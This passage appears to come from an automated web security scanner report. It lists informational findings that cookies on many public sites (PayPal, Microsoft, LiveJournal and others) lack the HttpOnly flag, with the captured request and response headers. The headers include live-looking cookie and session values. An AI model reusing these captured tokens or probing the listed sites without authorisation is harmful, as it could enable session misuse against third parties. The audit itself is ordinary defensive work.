Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 536a515975b0bb224c84dbf364570dc5=d25c0652ad8dc304e171cefb60e2e9c9; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nb-no" lang="nb-no" dir=
...[SNIP]...

14.780. http://www.joomlapt.com/comunidade-joomlapt/139-joomla-16-ja-chegou.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlapt.com
Path:   /comunidade-joomlapt/139-joomla-16-ja-chegou.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • d4dad6935f632ac35975e3001dc7bbe8=ojepc2gnaddk51l2fk130dsb57; path=/
  • ja_social_tpl=ja_social; expires=Sat, 14-Jan-2012 15:55:51 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /comunidade-joomlapt/139-joomla-16-ja-chegou.html HTTP/1.1
Host: www.joomlapt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=ojepc2gnaddk51l2fk130dsb57; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_social_tpl=ja_social; expires=Sat, 14-Jan-2012 15:55:51 GMT; path=/
Expires:
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org
...[SNIP]...

14.781. http://www.jt.gen.tr/makaleler/46-joomla-16.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jt.gen.tr
Path:   /makaleler/46-joomla-16.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 619eb53f4a8cd392a6fe48a16c891436=63427cbf922f139568c46da3ddcb18be; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /makaleler/46-joomla-16.html HTTP/1.1
Host: www.jt.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 619eb53f4a8cd392a6fe48a16c891436=63427cbf922f139568c46da3ddcb18be; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-tr" lang="tr-tr" >
<he
...[SNIP]...

14.782. http://www.kwitco.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kwitco.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • exp_last_visit=980592161; expires=Wed, 25-Jan-2012 04:42:41 GMT; path=/
  • exp_last_activity=1295952161; expires=Wed, 25-Jan-2012 04:42:41 GMT; path=/
  • exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.kwitco.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: exp_last_visit=980592161; expires=Wed, 25-Jan-2012 04:42:41 GMT; path=/
Set-Cookie: exp_last_activity=1295952161; expires=Wed, 25-Jan-2012 04:42:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Last-Modified: Tue, 25 Jan 2011 04:42:41 GMT
Connection: close
Content-Type: text/html
Content-Length: 8240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Kwittk
...[SNIP]...

14.783. http://www.lexus.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lexus.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • Apache=204.245.162.37.78011295930564514; expires=Wed, 22-Aug-2012 17:30:00 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lexus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Cache-Control: max-age=173136
Expires: Thu, 27 Jan 2011 04:48:20 GMT
Date: Tue, 25 Jan 2011 04:42:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=204.245.162.37.78011295930564514; expires=Wed, 22-Aug-2012 17:30:00 GMT; path=/
Content-Length: 51157

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
   <tit
...[SNIP]...

14.784. http://www.linkagogo.com/go/AddNoPopup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • userName=guest; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27elZo"
Last-Modified: Tue, 25 Jan 2011 04:41:53 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16308
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...

14.785. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /7-joomla-naujienos/70-joomla-160-isleista.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 2d3002958ebe475c6a8e5c841c44742a=ab02d207ed15eb2c3afc574ced1efe67; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /7-joomla-naujienos/70-joomla-160-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:25 GMT
Server: Apache
Set-Cookie: 2d3002958ebe475c6a8e5c841c44742a=ab02d207ed15eb2c3afc574ced1efe67; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...

14.786. http://www.livejournal.com/update.bml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /update.bml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 04:43:03 GMT
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws33
Set-Cookie: ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
Cache-Control: private, proxy-revalidate
ETag: "0d1717ff7e20cf2aa2b1705c6fb92344"
Content-length: 48142
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...

14.787. http://www.lynda.com/landing/softwaretraining.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lynda.com
Path:   /landing/softwaretraining.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ARPT=KWWVWPSw4CYMO; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw4CYMO; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pzpdm555fipjxc55k40s5iaj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pzpdm555fipjxc55k40s5iaj; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:43:19 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:43:19 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:43:19 GMT; path=/
X-Powered-By: ASP.NET
From: 284440-web4
Date: Tue, 25 Jan 2011 04:43:19 GMT
Connection: close
Content-Length: 24612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...

14.788. http://www.microsoft.com/web/joomla/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /web/joomla/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • WebLanguagePreference=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web/joomla/ HTTP/1.1
Host: www.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; msdn=L=1033; omniID=1294458843112_6a73_9555_4be9_86ce555049db; ixpLightBrowser=0; WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=EmulateIE8
Set-Cookie: WebLanguagePreference=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
VTag: 791249211700000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:01:36 GMT
Content-Length: 103075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head
...[SNIP]...

14.789. http://www.myride.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myride.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • cweb=JONQJVS10.4.128.192CKMMI; path=/
  • USER_UUID_VCH=48FF47EA%2DCE8D%2DEABF%2D0FDF88CEC9C9E345;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
  • TIME=%7Bts%20%272011%2D01%2D24%2016%3A07%3A26%27%7D;path=/
  • TIME=%7Bts%20%272011%2D01%2D24%2020%3A08%3A26%27%7D;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
  • ID=27821%3BRIDE;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.myride.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:08:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:08:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cweb=JONQJVS10.4.128.192CKMMI; path=/
Set-Cookie: USER_UUID_VCH=48FF47EA%2DCE8D%2DEABF%2D0FDF88CEC9C9E345;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2016%3A07%3A26%27%7D;path=/
Set-Cookie: COUNT=1;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2020%3A08%3A26%27%7D;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: ID=27821%3BRIDE;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=1;path=/
Content-Length: 42720

<!-- CWEB429 --><!-- www -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   
       <title>New Cars | Used Cars for Sale | New and Used Car Prices | MyRide.com</title>
...[SNIP]...

14.790. http://www.newsvine.com/_wine/save

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_wine/save

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • vid=78a8cf29905fb686db7d439484f26124; expires=Mon, 20-Jan-2031 05:02:55 GMT; path=/; domain=.newsvine.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_wine/save HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 05:02:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=78a8cf29905fb686db7d439484f26124; expires=Mon, 20-Jan-2031 05:02:55 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/login?popoff&redirect=http%3A%2F%2Fwww.newsvine.com%2F_wine%2Fsave
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 15929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...

14.791. http://www.nexternal.com/ecommerce/joomla-shopping-cart.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nexternal.com
Path:   /ecommerce/joomla-shopping-cart.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • homepagelog%5Fid=16003527; expires=Tue, 08-Jan-2013 08:00:00 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/joomla-shopping-cart.asp?source=google/ HTTP/1.1
Host: www.nexternal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:06:03 GMT
Server: SERVER
Set-Cookie: homepagelog%5Fid=16003527; expires=Tue, 08-Jan-2013 08:00:00 GMT; path=/
Set-Cookie: SQL=; path=/
P3P: CP="NOI DSP COR CURa OUR NOR"
Cache-control: private
Content-Length: 17852
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Co
...[SNIP]...

14.792. http://www.noreastermagazine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.noreastermagazine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 7f17775ebaca27b049989f22de967fcd=8770a74d6eac2afa63076869bfca0779; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.noreastermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: 7f17775ebaca27b049989f22de967fcd=8770a74d6eac2afa63076869bfca0779; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:08:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5572
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

14.793. http://www.omniture.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerhttp_omniture=84542986.5892.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 00:08:41 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

14.794. http://www.outdoorphotographer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorphotographer.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 712027b123d61fc48aa279ef791369c4=23b27b102f5b9ec9a6db3d7427c77e90; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.outdoorphotographer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:22 GMT
Server: Apache
Set-Cookie: 712027b123d61fc48aa279ef791369c4=23b27b102f5b9ec9a6db3d7427c77e90; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.795. https://www.paypal.com/cgi-bin/webscr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • Apache=10.190.8.167.1295914136420337; path=/; expires=Thu, 17-Jan-41 00:08:56 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:56 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=HjCqYFc5CXevJqotkFvMFXXfoIhvN4EW-tKQaiEr8amgJtib0LN-pmWtmu8m4ykzPAW2XZqlpMiPKRHK4wvHNGkR63CpLZRW66OIADyLhqUeCW3OJL35JwPuquu9XtupCaGbkm%7c7MTs5u44SsQwlwsvfYBCh-eN7c-WopQW6ARNbpWah9zCNwXi7WheWGQ_fSWzNJZRd5Af5W%7cqZnpbU6jjFBhsFea-10nNBdj15bLnQiVDM35QkeV0xMIv34GNGCo06XR8iUJDMZcLQxoK0%7c1295914136; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=DG0txL-D_ExP4tRfsCqsa40Ft5wDbFyjquJlxwVRFta791T3X2o2_RMTFJrbEaIkf1tYt_faGHrn0XU5; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d7%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.190.8.167.1295914136420337; path=/; expires=Thu, 17-Jan-41 00:08:56 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!--

...[SNIP]...

14.796. http://www.playshakespeare.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playshakespeare.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180908

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns=
...[SNIP]...

14.797. http://www.pwc-traderonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pwc-traderonline.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
